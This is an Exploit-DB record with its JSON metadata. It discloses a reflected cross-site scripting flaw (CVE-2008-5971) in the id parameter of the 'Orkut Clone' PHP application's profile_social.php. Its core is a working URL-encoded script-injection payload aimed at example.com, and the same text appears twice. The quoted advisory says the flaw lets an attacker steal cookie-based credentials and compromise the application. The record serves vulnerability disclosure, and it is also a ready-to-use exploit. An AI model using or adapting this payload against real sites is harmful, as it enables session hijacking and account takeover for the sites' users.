ID: EDB-ID:32637
Type: exploitdb
Reporter: d3b4g
Modified: 2008-12-02T00:00:00
Description
Orkut Clone profile_social.php id Parameter XSS. CVE-2008-5971. Webapps exploit for PHP platform.
source: http://www.securityfocus.com/bid/32600/info
Orkut Clone is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/profile_social.php?id=%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert(0000)%3B%3C/ScRiPt%3E
{"id": "EDB-ID:32637", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Orkut Clone profile_social.php id Parameter XSS", "description": "Orkut Clone profile_social.php id Parameter XSS. CVE-2008-5971 . Webapps exploit for php platform", "published": "2008-12-02T00:00:00", "modified": "2008-12-02T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/32637/", "reporter": "d3b4g", "references": [], "cvelist": ["CVE-2008-5971"], "lastseen": "2016-02-03T17:28:26", "viewCount": 4, "enchantments": {"score": {"value": 5.0, "vector": "NONE", "modified": "2016-02-03T17:28:26", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-5971"]}], "modified": "2016-02-03T17:28:26", "rev": 2}, "vulnersScore": 5.0}, "sourceHref": "https://www.exploit-db.com/download/32637/", "sourceData": "source: http://www.securityfocus.com/bid/32600/info\r\n \r\nOrkut Clone is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nhttp://www.example.com/profile_social.php?id=%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert(0000)%3B%3C/ScRiPt%3E ", "osvdbidlist": ["50393"]}